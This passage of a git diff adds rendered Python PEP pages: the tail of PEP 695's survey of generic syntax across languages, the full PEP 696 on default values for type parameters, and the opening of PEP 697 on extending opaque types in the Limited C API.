TypeScript uses declaration-site variance. Variance is inferred from +usage, not specified explicitly. TypeScript 4.7 introduced the ability +to specify variance using in and out keywords. This was added to handle +extremely complex types where inference of variance was expensive.

+

A default type argument can be specified using the = operator.

+

TypeScript supports the type keyword to declare a type alias, and this +syntax supports generics.

+
// Generic interface
+interface InterfaceA<S, T extends SomeInterface1> {
+    val1: S;
+    val2: T;
+
+    method1<U extends SomeInterface2>(val: U): S
+}
+
+// Generic function
+function func1<T, K extends keyof T>(ojb: T, key: K) { }
+
+// Contravariant and covariant type parameters (TypeScript 4.7)
+interface InterfaceB<in S, out T> { }
+
+// Type parameter with default
+interface InterfaceC<T = SomeInterface3> { }
+
+// Generic type alias
+type MyType<T extends SomeInterface4> = Array<T>
+
+
+
+
+

Scala

+

In Scala, square brackets are used to declare type parameters. Square +brackets are also used for specialization. The <: and >: operators +are used to specify upper and lower bounds, respectively.

+

Scala uses use-site variance but also allows declaration-site variance +specification. It uses a + or - prefix operator for covariance and +contravariance, respectively.

+

Scala provides no way to specify a default type argument.

+

It does support higher-kinded types (type parameters that accept type +type parameters).

+
// Generic class; type parameter has upper bound
+class ClassA[A <: SomeClass1]
+{
+    // Generic method; type parameter has lower bound
+    def method1[B >: A](val: B) ...
+}
+
+// Use of an upper and lower bound with the same type parameter
+class ClassB[A >: SomeClass1 <: SomeClass2] { }
+
+// Contravariant and covariant type parameters
+class ClassC[+A, -B] { }
+
+// Higher-kinded type
+trait Collection[T[_]]
+{
+    def method1[A](a: A): T[A]
+    def method2[B](b: T[B]): B
+}
+
+// Generic type alias
+type MyType[T <: Int] = Container[T]
+
+
+
+
+

Swift

+

Swift uses angle brackets to declare type parameters and for specialization. +The upper bound of a type parameter is specified using a colon.

+

Swift doesn’t support generic variance; all type parameters are invariant.

+

Swift provides no way to specify a default type argument.

+
// Generic class
+class ClassA<T> {
+    // Generic method
+    func method1<X>(val: T) -> X { }
+}
+
+// Type parameter with upper bound constraint
+class ClassB<T: SomeClass1> {}
+
+// Generic type alias
+typealias MyType<A> = Container<A>
+
+
+
+
+

Rust

+

Rust uses angle brackets to declare type parameters and for specialization. +The upper bound of a type parameter is specified using a colon. Alternatively +a where clause can specify various constraints.

+

Rust does not have traditional object oriented inheritance or variance. +Subtyping in Rust is very restricted and occurs only due to variance with +respect to lifetimes.

+

A default type argument can be specified using the = operator.

+
// Generic class
+struct StructA<T> { // T's lifetime is inferred as covariant
+    x: T
+}
+
+fn f<'a>(
+    mut short_lifetime: StructA<&'a i32>,
+    mut long_lifetime: StructA<&'static i32>,
+) {
+    long_lifetime = short_lifetime;
+    // error: StructA<&'a i32> is not a subtype of StructA<&'static i32>
+    short_lifetime = long_lifetime;
+    // valid: StructA<&'static i32> is a subtype of StructA<&'a i32>
+}
+
+// Type parameter with bound
+struct StructB<T: SomeTrait> {}
+
+// Type parameter with additional constraints
+struct StructC<T>
+where
+    T: Iterator,
+    T::Item: Copy
+{}
+
+// Generic function
+fn func1<T>(val: &[T]) -> T { }
+
+// Generic type alias
+type MyType<T> = StructC<T>;
+
+
+
+
+

Kotlin

+

Kotlin uses angle brackets to declare type parameters and for specialization. +By default, type parameters are invariant. The upper bound of a type is +specified using a colon. +Alternatively, a where clause can specify various constraints.

+

Kotlin supports declaration-site variance where variance of type parameters is +explicitly declared using in and out keywords. It also supports use-site +variance which limits which methods and members can be used.

+

Kotlin provides no way to specify a default type argument.

+
// Generic class
+class ClassA<T>
+
+// Type parameter with upper bound
+class ClassB<T : SomeClass1>
+
+// Contravariant and covariant type parameters
+class ClassC<in S, out T>
+
+// Generic function
+fun <T> func1(): T {
+
+    // Use site variance
+    val covariantA: ClassA<out Number>
+    val contravariantA: ClassA<in Number>
+}
+
+// Generic type alias
+typealias TypeAliasFoo<T> = ClassA<T>
+
+
+
+
+

Julia

+

Julia uses curly braces to declare type parameters and for specialization. +The <: operator can be used within a where clause to declare +upper and lower bounds on a type.

+
# Generic struct; type parameter with upper and lower bounds
+# Valid for T in (Int64, Signed, Integer, Real, Number)
+struct Container{Int <: T <: Number}
+    x::T
+end
+
+# Generic function
+function func1(v::Container{T}) where T <: Real end
+
+# Alternate forms of generic function
+function func2(v::Container{T} where T <: Real) end
+function func3(v::Container{<: Real}) end
+
+# Tuple types are covariant
+# Valid for func4((2//3, 3.5))
+function func4(t::Tuple{Real,Real}) end
+
+
+
+
+

Dart

+

Dart uses angle brackets to declare type parameters and for specialization. +The upper bound of a type is specified using the extends keyword. +By default, type parameters are covariant.

+

Dart supports declaration-site variance, where variance of type parameters is +explicitly declared using in, out and inout keywords. +It does not support use-site variance.

+

Dart provides no way to specify a default type argument.

+
// Generic class
+class ClassA<T> { }
+
+// Type parameter with upper bound
+class ClassB<T extends SomeClass1> { }
+
+// Contravariant and covariant type parameters
+class ClassC<in S, out T> { }
+
+// Generic function
+T func1<T>() { }
+
+// Generic type alias
+typedef TypeDefFoo<T> = ClassA<T>;
+
+
+
+
+

Go

+

Go uses square brackets to declare type parameters and for specialization. +The upper bound of a type is specified after the name of the parameter, and +must always be specified. The keyword any is used for an unbound type parameter.

+

Go doesn’t support variance; all type parameters are invariant.

+

Go provides no way to specify a default type argument.

+

Go does not support generic type aliases.

+
// Generic type without a bound
+type TypeA[T any] struct {
+    t T
+}
+
+// Type parameter with upper bound
+type TypeB[T SomeType1] struct { }
+
+// Generic function
+func func1[T any]() { }
+
+
+
+
+

Summary

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Decl +SyntaxUpper +BoundLower +BoundDefault +ValueVariance +SiteVariance
C++template +<>n/an/a=n/an/a
Java<>extendsusesuper, +extends
C#<>wheredeclin, out
TypeScript<>extends=declinferred, +in, out
Scala[]T <: XT >: Xuse, decl+, -
Swift<>T: Xn/an/a
Rust<>T: X, +where=n/an/a
Kotlin<>T: X, +whereuse, declin, out
Julia{}T <: XX <: Tn/an/a
Dart<>extendsdeclin, out, +inout
Go[]T Xn/an/a
Python +(proposed)[]T: Xdeclinferred
+
+
+
+

Acknowledgements

+

Thanks to Sebastian Rittau for kick-starting the discussions that led to this +proposal, to Jukka Lehtosalo for proposing the syntax for type alias +statements and to Jelle Zijlstra, Daniel Moisset, and Guido van Rossum +for their valuable feedback and suggested improvements to the specification +and implementation.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0695.rst

+

Last modified: 2024-02-17 03:25:41 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0696/index.html b/pep-0696/index.html new file mode 100644 index 00000000000..2c6c5c766b5 --- /dev/null +++ b/pep-0696/index.html @@ -0,0 +1,769 @@ + + + + + + + + PEP 696 – Type Defaults for Type Parameters | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 696 – Type Defaults for Type Parameters

+
+
Author:
+
James Hilton-Balfe <gobot1234yt at gmail.com>
+
Sponsor:
+
Jelle Zijlstra <jelle.zijlstra at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
14-Jul-2022
+
Python-Version:
+
3.13
+
Post-History:
+
22-Mar-2022, +08-Jan-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Defaults for Type Parameters and +Type parameter lists for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP introduces the concept of type defaults for type parameters, +including TypeVar, ParamSpec, and TypeVarTuple, +which act as defaults for type parameters for which no type is specified.

+

Default type argument support is available in some popular languages +such as C++, TypeScript, and Rust. A survey of type parameter syntax in +some common languages has been conducted by the author of PEP 695 +and can be found in its +Appendix A.

+
+
+

Motivation

+
T = TypeVar("T", default=int)  # This means that if no type is specified T = int
+
+@dataclass
+class Box(Generic[T]):
+    value: T | None = None
+
+reveal_type(Box())                      # type is Box[int]
+reveal_type(Box(value="Hello World!"))  # type is Box[str]
+
+
+

One place this regularly comes +up is Generator. I +propose changing the stub definition to something like:

+
YieldT = TypeVar("YieldT")
+SendT = TypeVar("SendT", default=None)
+ReturnT = TypeVar("ReturnT", default=None)
+
+class Generator(Generic[YieldT, SendT, ReturnT]): ...
+
+Generator[int] == Generator[int, None] == Generator[int, None, None]
+
+
+

This is also useful for a Generic that is commonly over one type.

+
class Bot: ...
+
+BotT = TypeVar("BotT", bound=Bot, default=Bot)
+
+class Context(Generic[BotT]):
+    bot: BotT
+
+class MyBot(Bot): ...
+
+reveal_type(Context().bot)         # type is Bot  # notice this is not Any which is what it would be currently
+reveal_type(Context[MyBot]().bot)  # type is MyBot
+
+
+

Not only does this improve typing for those who explicitly use it, it +also helps non-typing users who rely on auto-complete to speed up their +development.

+

This design pattern is common in projects like:

+
    +
  • discord.py — where the +example above was taken from.
  • +
  • NumPy — the default for types +like ndarray’s dtype would be float64. Currently it’s +Unknown or Any.
  • +
  • TensorFlow — this +could be used for Tensor similarly to numpy.ndarray and would be +useful to simplify the definition of Layer.
  • +
+
+
+

Specification

+
+

Default Ordering and Subscription Rules

+

The order for defaults should follow the standard function parameter +rules, so a type parameter with no default cannot follow one with +a default value. Doing so should ideally raise a TypeError in +typing._GenericAlias/types.GenericAlias, and a type checker +should flag this as an error.

+
DefaultStrT = TypeVar("DefaultStrT", default=str)
+DefaultIntT = TypeVar("DefaultIntT", default=int)
+DefaultBoolT = TypeVar("DefaultBoolT", default=bool)
+T = TypeVar("T")
+T2 = TypeVar("T2")
+
+class NonDefaultFollowsDefault(Generic[DefaultStrT, T]): ...  # Invalid: non-default TypeVars cannot follow ones with defaults
+
+
+class NoNonDefaults(Generic[DefaultStrT, DefaultIntT]): ...
+
+(
+    NoNoneDefaults ==
+    NoNoneDefaults[str] ==
+    NoNoneDefaults[str, int]
+)  # All valid
+
+
+class OneDefault(Generic[T, DefaultBoolT]): ...
+
+OneDefault[float] == OneDefault[float, bool]  # Valid
+reveal_type(OneDefault)          # type is type[OneDefault[T, DefaultBoolT = bool]]
+reveal_type(OneDefault[float]()) # type is OneDefault[float, bool]
+
+
+class AllTheDefaults(Generic[T1, T2, DefaultStrT, DefaultIntT, DefaultBoolT]): ...
+
+reveal_type(AllTheDefaults)                  # type is type[AllTheDefaults[T1, T2, DefaultStrT = str, DefaultIntT = int, DefaultBoolT = bool]]
+reveal_type(AllTheDefaults[int, complex]())  # type is AllTheDefaults[int, complex, str, int, bool]
+AllTheDefaults[int]  # Invalid: expected 2 arguments to AllTheDefaults
+(
+    AllTheDefaults[int, complex] ==
+    AllTheDefaults[int, complex, str] ==
+    AllTheDefaults[int, complex, str, int] ==
+    AllTheDefaults[int, complex, str, int, bool]
+)  # All valid
+
+
+

With the new Python 3.12 syntax for generics (introduced by PEP 695), this can +be enforced at compile time:

+
type Alias[DefaultT = int, T] = tuple[DefaultT, T]  # SyntaxError: non-default TypeVars cannot follow ones with defaults
+
+def generic_func[DefaultT = int, T](x: DefaultT, y: T) -> None: ...  # SyntaxError: non-default TypeVars cannot follow ones with defaults
+
+class GenericClass[DefaultT = int, T]: ...  # SyntaxError: non-default TypeVars cannot follow ones with defaults
+
+
+
+
+

ParamSpec Defaults

+

ParamSpec defaults are defined using the same syntax as +TypeVar s but use a list of types or an ellipsis +literal “...” or another in-scope ParamSpec (see Scoping Rules).

+
DefaultP = ParamSpec("DefaultP", default=[str, int])
+
+class Foo(Generic[DefaultP]): ...
+
+reveal_type(Foo)                  # type is type[Foo[DefaultP = [str, int]]]
+reveal_type(Foo())                # type is Foo[[str, int]]
+reveal_type(Foo[[bool, bool]]())  # type is Foo[[bool, bool]]
+
+
+
+
+

TypeVarTuple Defaults

+

TypeVarTuple defaults are defined using the same syntax as +TypeVar s but use an unpacked tuple of types instead of a single type +or another in-scope TypeVarTuple (see Scoping Rules).

+
DefaultTs = TypeVarTuple("DefaultTs", default=Unpack[tuple[str, int]])
+
+class Foo(Generic[*DefaultTs]): ...
+
+reveal_type(Foo)               # type is type[Foo[DefaultTs = *tuple[str, int]]]
+reveal_type(Foo())             # type is Foo[str, int]
+reveal_type(Foo[int, bool]())  # type is Foo[int, bool]
+
+
+
+
+

Using Another Type Parameter as default

+

This allows for a value to be used again when the type parameter to a +generic is missing but another type parameter is specified.

+

To use another type parameter as a default the default and the +type parameter must be the same type (a TypeVar’s default must be +a TypeVar, etc.).

+

This could be used on builtins.slice +where the start parameter should default to int, stop +default to the type of start and step default to int | None.

+
StartT = TypeVar("StartT", default=int)
+StopT = TypeVar("StopT", default=StartT)
+StepT = TypeVar("StepT", default=int | None)
+
+class slice(Generic[StartT, StopT, StepT]): ...
+
+reveal_type(slice)  # type is type[slice[StartT = int, StopT = StartT, StepT = int | None]]
+reveal_type(slice())                        # type is slice[int, int, int | None]
+reveal_type(slice[str]())                   # type is slice[str, str, int | None]
+reveal_type(slice[str, bool, timedelta]())  # type is slice[str, bool, timedelta]
+
+T2 = TypeVar("T2", default=DefaultStrT)
+
+class Foo(Generic[DefaultStrT, T2]):
+    def __init__(self, a: DefaultStrT, b: T2) -> None: ...
+
+reveal_type(Foo(1, ""))  # type is Foo[int, str]
+Foo[int](1, "")          # Invalid: Foo[int, str] cannot be assigned to self: Foo[int, int] in Foo.__init__
+Foo[int]("", 1)          # Invalid: Foo[str, int] cannot be assigned to self: Foo[int, int] in Foo.__init__
+
+
+

When using a type parameter as the default to another type parameter, the +following rules apply, where T1 is the default for T2.

+
+

Scoping Rules

+

T1 must be used before T2 in the parameter list of the generic.

+
T2 = TypeVar("T2", default=T1)
+
+class Foo(Generic[T1, T2]): ...   # Valid
+class Foo(Generic[T1]):
+    class Bar(Generic[T2]): ...   # Valid
+
+StartT = TypeVar("StartT", default="StopT")  # Swapped defaults around from previous example
+StopT = TypeVar("StopT", default=int)
+class slice(Generic[StartT, StopT, StepT]): ...
+                  # ^^^^^^ Invalid: ordering does not allow StopT to be bound
+
+
+

Using a type parameter from an outer scope as a default is not supported.

+
+
+

Bound Rules

+

T1’s bound must be a subtype of T2’s bound.

+
T1 = TypeVar("T1", bound=int)
+TypeVar("Ok", default=T1, bound=float)     # Valid
+TypeVar("AlsoOk", default=T1, bound=int)   # Valid
+TypeVar("Invalid", default=T1, bound=str)  # Invalid: int is not a subtype of str
+
+
+
+
+

Constraint Rules

+

The constraints of T2 must be a superset of the constraints of T1.

+
T1 = TypeVar("T1", bound=int)
+TypeVar("Invalid", float, str, default=T1)         # Invalid: upper bound int is incompatible with constraints float or str
+
+T1 = TypeVar("T1", int, str)
+TypeVar("AlsoOk", int, str, bool, default=T1)      # Valid
+TypeVar("AlsoInvalid", bool, complex, default=T1)  # Invalid: {bool, complex} is not a superset of {int, str}
+
+
+
+
+

Type Parameters as Parameters to Generics

+

Type parameters are valid as parameters to generics inside of a +default when the first parameter is in scope as determined by the +previous section.

+
T = TypeVar("T")
+ListDefaultT = TypeVar("ListDefaultT", default=list[T])
+
+class Bar(Generic[T, ListDefaultT]):
+    def __init__(self, x: T, y: ListDefaultT): ...
+
+reveal_type(Bar)                    # type is type[Bar[T, ListDefaultT = list[T]]]
+reveal_type(Bar[int])               # type is type[Bar[int, list[int]]]
+reveal_type(Bar[int]())             # type is Bar[int, list[int]]
+reveal_type(Bar[int, list[str]]())  # type is Bar[int, list[str]]
+reveal_type(Bar[int, str]())        # type is Bar[int, str]
+
+
+
+
+

Specialisation Rules

+

Type parameters currently cannot be further subscripted. This might +change if Higher Kinded TypeVars +are implemented.

+
+
+
+

Generic TypeAliases

+

Generic TypeAliases should be able to be further subscripted +following normal subscription rules. If a type parameter has a default +that hasn’t been overridden it should be treated like it was +substituted into the TypeAlias. However, it can be specialised +further down the line.

+
class SomethingWithNoDefaults(Generic[T, T2]): ...
+
+MyAlias: TypeAlias = SomethingWithNoDefaults[int, DefaultStrT]  # Valid
+reveal_type(MyAlias)          # type is type[SomethingWithNoDefaults[int, DefaultStrT]]
+reveal_type(MyAlias[bool]())  # type is SomethingWithNoDefaults[int, bool]
+
+MyAlias[bool, int]  # Invalid: too many arguments passed to MyAlias
+
+
+
+
+

Subclassing

+

Subclasses of Generics with type parameters that have defaults +behave similarly to Generic TypeAliases. That is, subclasses can be +further subscripted following normal subscription rules, non-overridden +defaults should be substituted in, and type parameters with such defaults can be +further specialised down the line.

+
class SubclassMe(Generic[T, DefaultStrT]):
+    x: DefaultStrT
+
+class Bar(SubclassMe[int, DefaultStrT]): ...
+reveal_type(Bar)          # type is type[Bar[DefaultStrT = str]]
+reveal_type(Bar())        # type is Bar[str]
+reveal_type(Bar[bool]())  # type is Bar[bool]
+
+class Foo(SubclassMe[float]): ...
+
+reveal_type(Foo().x)  # type is str
+
+Foo[str]  # Invalid: Foo cannot be further subscripted
+
+class Baz(Generic[DefaultIntT, DefaultStrT]): ...
+
+class Spam(Baz): ...
+reveal_type(Spam())  # type is <subclass of Baz[int, str]>
+
+
+
+
+

Using bound and default

+

If both bound and default are passed default must be a +subtype of bound. Otherwise the type checker should generate an +error.

+
TypeVar("Ok", bound=float, default=int)     # Valid
+TypeVar("Invalid", bound=str, default=int)  # Invalid: the bound and default are incompatible
+
+
+
+
+

Constraints

+

For constrained TypeVars, the default needs to be one of the +constraints. A type checker should generate an error even if it is a +subtype of one of the constraints.

+
TypeVar("Ok", float, str, default=float)     # Valid
+TypeVar("Invalid", float, str, default=int)  # Invalid: expected one of float or str got int
+
+
+
+
+

Function Defaults

+

In generic functions, type checkers may use a type parameter’s default when the +type parameter cannot be solved to anything. We leave the semantics of this +usage unspecified, as ensuring the default is returned in every code path +where the type parameter can go unsolved may be too hard to implement. Type +checkers are free to either disallow this case or experiment with implementing +support.

+
T = TypeVar('T', default=int)
+def func(x: int | set[T]) -> T: ...
+reveal_type(func(0))  # a type checker may reveal T's default of int here
+
+
+
+
+

Defaults following TypeVarTuple

+

A TypeVar that immediately follows a TypeVarTuple is not allowed +to have a default, because it would be ambiguous whether a type argument +should be bound to the TypeVarTuple or the defaulted TypeVar.

+
Ts = TypeVarTuple("Ts")
+T = TypeVar("T", default=bool)
+
+class Foo(Generic[Ts, T]): ...  # Type checker error
+
+# Could be reasonably interpreted as either Ts = (int, str, float), T = bool
+# or Ts = (int, str), T = float
+Foo[int, str, float]
+
+
+

With the Python 3.12 built-in generic syntax, this case should raise a SyntaxError.

+

However, it is allowed to have a ParamSpec with a default following a +TypeVarTuple with a default, as there can be no ambiguity between a type argument +for the ParamSpec and one for the TypeVarTuple.

+
Ts = TypeVarTuple("Ts")
+P = ParamSpec("P", default=[float, bool])
+
+class Foo(Generic[Ts, P]): ...  # Valid
+
+Foo[int, str]  # Ts = (int, str), P = [float, bool]
+Foo[int, str, [bytes]]  # Ts = (int, str), P = [bytes]
+
+
+
+
+

Subtyping

+

Type parameter defaults do not affect the subtyping rules for generic classes. +In particular, defaults can be ignored when considering whether a class is +compatible with a generic protocol.

+
+
+

TypeVarTuples as Defaults

+

Using a TypeVarTuple as a default is not supported because:

+
    +
  • Scoping Rules does not allow usage of type parameters +from outer scopes.
  • +
  • Multiple TypeVarTuples cannot appear in the type +parameter list for a single object, as specified in +PEP 646.
  • +
+

These reasons leave no current valid location where a +TypeVarTuple could be used as the default of another TypeVarTuple.

+
+
+
+

Binding rules

+

Type parameter defaults should be bound by attribute access +(including call and subscript).

+
class Foo[T = int]:
+    def meth(self) -> Self:
+        return self
+
+reveal_type(Foo.meth)  # type is (self: Foo[int]) -> Foo[int]
+
+
+
+
+

Implementation

+

At runtime, this would involve the following changes to the typing +module.

+
    +
  • The classes TypeVar, ParamSpec, and TypeVarTuple should +expose the type passed to default. This would be available as +a __default__ attribute, which would be None if no argument +is passed and NoneType if default=None.
  • +
+

The following changes would be required to both GenericAliases:

+
    +
  • logic to determine the defaults required for a subscription.
  • +
  • ideally, logic to determine if subscription (like +Generic[T, DefaultT]) would be valid.
  • +
+

The grammar for type parameter lists would need to be updated to +allow defaults; see below.

+

A reference implementation of the runtime changes can be found at +https://github.com/Gobot1234/cpython/tree/pep-696

+

A reference implementation of the type checker can be found at +https://github.com/Gobot1234/mypy/tree/TypeVar-defaults

+

Pyright currently supports this functionality.

+
+

Grammar changes

+

The syntax added in PEP 695 will be extended to introduce a way +to specify defaults for type parameters using the “=” operator inside +of the square brackets like so:

+
# TypeVars
+class Foo[T = str]: ...
+
+# ParamSpecs
+class Baz[**P = [int, str]]: ...
+
+# TypeVarTuples
+class Qux[*Ts = *tuple[int, bool]]: ...
+
+# TypeAliases
+type Foo[T, U = str] = Bar[T, U]
+type Baz[**P = [int, str]] = Spam[**P]
+type Qux[*Ts = *tuple[str]] = Ham[*Ts]
+type Rab[U, T = str] = Bar[T, U]
+
+
+

Similarly to the bound for a type parameter, +defaults should be lazily evaluated, with the same scoping rules to +avoid the unnecessary usage of quotes around them.

+

This functionality was included in the initial draft of PEP 695 but +was removed due to scope creep.

+

The following changes would be made to the grammar:

+
type_param:
+    | a=NAME b=[type_param_bound] d=[type_param_default]
+    | a=NAME c=[type_param_constraint] d=[type_param_default]
+    | '*' a=NAME d=[type_param_default]
+    | '**' a=NAME d=[type_param_default]
+
+type_param_default:
+    | '=' e=expression
+    | '=' e=starred_expression
+
+
+

The compiler would enforce that type parameters without defaults cannot +follow type parameters with defaults and that TypeVars with defaults +cannot immediately follow TypeVarTuples.

+
+
+
+

Rejected Alternatives

+
+

Allowing the Type Parameters Defaults to Be Passed to type.__new__’s **kwargs

+
T = TypeVar("T")
+
+@dataclass
+class Box(Generic[T], T=int):
+    value: T | None = None
+
+
+

While this is much easier to read and follows a similar rationale to the +TypeVar unary +syntax, it would not be +backwards compatible as T might already be passed to a +metaclass/superclass or support classes that don’t subclass Generic +at runtime.

+

Ideally, if PEP 637 wasn’t rejected, the following would be acceptable:

+
T = TypeVar("T")
+
+@dataclass
+class Box(Generic[T = int]):
+    value: T | None = None
+
+
+
+
+

Allowing Non-defaults to Follow Defaults

+
YieldT = TypeVar("YieldT", default=Any)
+SendT = TypeVar("SendT", default=Any)
+ReturnT = TypeVar("ReturnT")
+
+class Coroutine(Generic[YieldT, SendT, ReturnT]): ...
+
+Coroutine[int] == Coroutine[Any, Any, int]
+
+
+

Allowing non-defaults to follow defaults would alleviate the issues with +returning types like Coroutine from functions where the most used +type argument is the last (the return). Allowing non-defaults to follow +defaults is too confusing and potentially ambiguous, even if only the +above two forms were valid. Changing the argument order now would also +break a lot of codebases. This is also solvable in most cases using a +TypeAlias.

+
Coro: TypeAlias = Coroutine[Any, Any, T]
+Coro[int] == Coroutine[Any, Any, int]
+
+
+
+
+

Having default Implicitly Be bound

+

In an earlier version of this PEP, the default was implicitly set +to bound if no value was passed for default. This while +convenient, could have a type parameter with no default follow a +type parameter with a default. Consider:

+
T = TypeVar("T", bound=int)  # default is implicitly int
+U = TypeVar("U")
+
+class Foo(Generic[T, U]):
+    ...
+
+# would expand to
+
+T = TypeVar("T", bound=int, default=int)
+U = TypeVar("U")
+
+class Foo(Generic[T, U]):
+    ...
+
+
+

This would have also been a breaking change for a small number of cases +where the code relied on Any being the implicit default.

+
+
+

Allowing Type Parameters With Defaults To Be Used in Function Signatures

+

A previous version of this PEP allowed TypeVarLikes with defaults to be used in +function signatures. This was removed for the reasons described in +Function Defaults. Hopefully, this can be added in the future if +a way to get the runtime value of a type parameter is added.

+
+
+

Allowing Type Parameters from Outer Scopes in default

+

This was deemed too niche a feature to be worth the added complexity. +If any cases arise where this is needed, it can be added in a future PEP.

+
+
+
+

Acknowledgements

+

Thanks to the following people for their feedback on the PEP:

+

Eric Traut, Jelle Zijlstra, Joshua Butt, Danny Yamamoto, Kaylynn Morgan +and Jakub Kuczys

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0696.rst

+

Last modified: 2024-09-03 17:24:02 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0697/index.html b/pep-0697/index.html new file mode 100644 index 00000000000..a48c15dc383 --- /dev/null +++ b/pep-0697/index.html @@ -0,0 +1,661 @@ + + + + + + + + PEP 697 – Limited C API for Extending Opaque Types | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 697 – Limited C API for Extending Opaque Types

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Aug-2022
+
Python-Version:
+
3.12
+
Post-History:
+
24-May-2022, +06-Oct-2022
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at PyType_Spec.basicsize, +PyObject_GetTypeData(), +Py_TPFLAGS_ITEMS_AT_END, +Py_RELATIVE_OFFSET, +PyObject_GetItemData().

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Add Limited C API +support for extending some types with opaque data +by allowing code to only deal with data specific to a particular (sub)class.

+

This mechanism is required to be usable with PyHeapTypeObject.

+

This PEP does not propose allowing to extend non-dynamically sized variable +sized objects such as tuple or int due to their different memory layout +and perceived lack of demand for doing so. This PEP leaves room to do so in +the future via the same mechanism if ever desired.

+
+
+

Motivation

+

The motivating problem this PEP solves is attaching C-level state +to custom types — i.e. metaclasses (subclasses of +type).

+

This is often needed in “wrappers” that expose another type +system (e.g. C++, Java, Rust) as Python classes. +These typically need to attach information about the “wrapped” non-Python +class to the Python type object.

+

This should be possible to do in the Limited API, so that the language wrappers +or code generators can be used to create Stable ABI extensions. +(See PEP 652 for the benefits of providing a stable ABI.)

+

Extending type is an instance of a more general problem: +extending a class while maintaining loose coupling – that is, +not depending on the memory layout used by the superclass. +(That’s a lot of jargon; see Rationale for a concrete example of extending +list.)

+
+
+

Rationale

+
+

Extending opaque types

+

In the Limited API, most structs are opaque: their size and memory layout +are not exposed, so they can be changed in new versions of CPython (or +alternate implementations of the C API).

+

This means that the usual subclassing pattern – making the struct +used for instances of the base type be the first element of the struct +used for instances of the derived type – does not work. +To illustrate with code, the example from the tutorial +extends PyListObject (list) +using the following struct:

+
typedef struct {
+    PyListObject list;
+    int state;
+} SubListObject;
+
+
+

This won’t compile in the Limited API, since PyListObject is opaque (to +allow changes as features and optimizations are implemented).

+

Instead, this PEP proposes using a struct with only the state needed +in the subclass, that is:

+
typedef struct {
+    int state;
+} SubListState;
+
+// (or just `typedef int SubListState;` in this case)
+
+
+

The subclass can now be completely decoupled from the memory layout (and size) +of the superclass.

+

This is possible today. To use such a struct:

+
    +
  • when creating the class, use PyListObject->tp_basicsize + sizeof(SubListState) +as PyType_Spec.basicsize;
  • +
  • when accessing the data, use PyListObject->tp_basicsize as the offset +into the instance (PyObject*).
  • +
+

However, this has disadvantages:

+
    +
  • The base’s basicsize may not be properly aligned, causing issues +on some architectures if not mitigated. (These issues can be particularly +nasty if alignment changes in a new release.)
  • +
  • PyTypeObject.tp_basicsize is not exposed in the +Limited API, so extensions that support Limited API need to +use PyObject_GetAttrString(obj, "__basicsize__"). +This is cumbersome, and unsafe in edge cases (the Python attribute can +be overridden).
  • +
  • Variable-size objects are not handled +(see Extending variable-size objects below).
  • +
+

To make this easy (and even best practice for projects that choose loose +coupling over maximum performance), this PEP proposes an API to:

+
    +
  1. During class creation, specify that SubListState +should be “appended” to PyListObject, without passing any additional +details about list. (The interpreter itself gets all necessary info, +like tp_basicsize, from the base).

    This will be specified by a negative PyType_Spec.basicsize: +-sizeof(SubListState).

    +
  2. +
  3. Given an instance, and the subclass PyTypeObject*, +get a pointer to the SubListState. +A new function, PyObject_GetTypeData, will be added for this.
  4. +
+

The base class is not limited to PyListObject, of course: it can be used to +extend any base class whose instance struct is opaque, unstable across +releases, or not exposed at all – including type +(PyHeapTypeObject) or third-party extensions +(for example, NumPy arrays [1]).

+

For cases where no additional state is needed, a zero basicsize will be +allowed: in that case, the base’s tp_basicsize will be inherited. +(This currently works, but lacks explicit documentation and tests.)

+

The tp_basicsize of the new class will be set to the computed total size, +so code that inspects classes will continue working as before.

+
+
+

Extending variable-size objects

+

Additional considerations are needed to subclass +variable-sized objects +while maintaining loose coupling: +the variable-sized data can collide with subclass data (SubListState in +the example above).

+

Currently, CPython doesn’t provide a way to prevent such collisions. +So, the proposed mechanism of extending opaque classes (negative +base->tp_itemsize) will fail by default.

+

We could stop there, but since the motivating type — PyHeapTypeObject — +is variable sized, we need a safe way to allow subclassing it. +A bit of background first:

+
+

Variable-size layouts

+

There are two main memory layouts for variable-sized objects.

+

In types such as int or tuple, the variable data is stored at a fixed +offset. +If subclasses need additional space, it must be added after any variable-sized +data:

+
PyTupleObject:
+┌───────────────────┬───┬───┬╌╌╌╌┐
+│ PyObject_VAR_HEAD │var. data   │
+└───────────────────┴───┴───┴╌╌╌╌┘
+
+tuple subclass:
+┌───────────────────┬───┬───┬╌╌╌╌┬─────────────┐
+│ PyObject_VAR_HEAD │var. data   │subclass data│
+└───────────────────┴───┴───┴╌╌╌╌┴─────────────┘
+
+
+

In other types, like PyHeapTypeObject, variable-sized data always lives at +the end of the instance’s memory area:

+
heap type:
+┌───────────────────┬──────────────┬───┬───┬╌╌╌╌┐
+│ PyObject_VAR_HEAD │Heap type data│var. data   │
+└───────────────────┴──────────────┴───┴───┴╌╌╌╌┘
+
